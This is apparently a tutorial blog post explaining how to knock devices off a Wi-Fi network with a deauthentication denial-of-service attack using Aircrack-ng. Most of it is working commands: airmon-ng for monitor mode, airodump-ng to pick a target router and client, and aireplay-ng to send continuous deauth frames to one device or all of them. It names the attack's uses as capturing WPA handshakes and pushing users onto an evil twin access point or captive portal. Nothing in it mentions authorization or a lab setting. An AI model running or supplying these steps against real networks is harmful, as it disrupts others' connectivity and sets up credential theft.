Use Aircrack-ng to DOS a Router

What is it

A Wi-Fi deauthentication attack is a type of denial-of-service attack that targets communication between a user and a Wi-Fi wireless access point.

Unlike most radio jammers, deauthentication acts in a unique way. The IEEE 802.11 (Wi-Fi) protocol contains the provision for a deauthentication frame. Sending the frame from the access point to a station is called a “sanctioned technique to inform a rogue station that they have been disconnected from the network”.[1]

An attacker can send a deauthentication frame at any time to a wireless access point, with a spoofed address for the victim. The protocol does not require any encryption for this frame, even when the session was established with Wired Equivalent Privacy (WEP) for data privacy, and the attacker only needs to know the victim’s MAC address, which is available in the clear through wireless network sniffing.

————Wi-Fi deauthentication attack, Wikipedia.

Why Use it

  • Capture WPA/WPA2 4-Way Handshakes by forcing users to reconnect to the network
  • Force users to connect to some bad access point (Evil Twin Attack)
  • Force users to connect to a Captive Portal

Terminology

  • Monitor Mode:

​ Monitor mode allows your NIC to capture data sent or received by wireless device in the air.

  • Packet Injection:

​ Packet injection allows you to inject or send data to wireless devices and networks nearby.

Preparation

  • Kali Linux or Ubuntu with Katoolins. Aireplay-ng(which is integrated in Aircrack-ng) It needed to complete the task.
  • NIC(Network Interface Controller) with monitor mood. For example, EDIMAX EW-7711UAN or TP-LINK TL-WN722N 150.
  • Target router.

Steps

ifconfig to get the network interface configuration.

iwconfig to get the wireless network interface configuration.

You can change the current channel by sudo iwconfig wlan0 channel x, where x is the target channel.

airmon-ng start wlan0 (wlan0, or whatever the adapter is called), to set it into monitor mode. if you want to stop the monitor mode, just replace ‘start’ with ‘stop’.

then, use iwconfig again, the status shown at the wlan0 will become ‘monitor’.

airodump-ng wlan0mon to scan the air around. It will return a list of access points.

  • BSSID: MAC address of the access point.
  • PWR: Signal level reported by the card.
  • Beacons: Number of announcements packets sent by the AP. Each AP sends about 10 beacons per second at the lowest rate (1M).
  • #Data: Number of captured data packets, including data broadcast packets.
  • #/s: Number of data packets per second measure over the last 10 seconds.
  • CH: Channel number.
  • MB: Maximum speed supported by the AP
  • ENC: Encryption algorithm in use
  • CIPHER: The cipher detected.
  • AUTH: The authentication protocol used
  • ESSID: Shows the wireless network name.

You can hit the keyboard to adjust information showing on screen. (see also: Chinese documentation)

  • a: change the content.
  • s: change sorting.
  • i: change the way of sorting.
  • d: restore the sorting (default by PWR).
  • r: start/stop real-time sorting.
  • m: change highlight color.
  • space: start/stop refreshing.

airodump-ng -d Target_BSSID -c Target_Channel wlan0mon will specifically monitoring information from target AP.

The MAC of devices that connect to the target AP will be shown.

aireplay-ng -0 0 -a Target_BSSID -c Target_Mac wlan0mon will start deauthenticating on the specific device.

  • -0: means deauthenticating.
  • 0: is the number of deauths to send. 0 means send them continuously, you can send 10 if you want the target to disconnect and reconnect.
  • -a: MAC address of the AP.
  • -c: MAC address of the device, It’s also possible to deauthenticate all the devices by ommiting ‘-c Target_Mac’.
  • wlan0mon: NIC name.

A list of information of routers around will be shown. Write down the victim’s BSSID(MAC address) and CH(channel). ESSID is the names of the routers.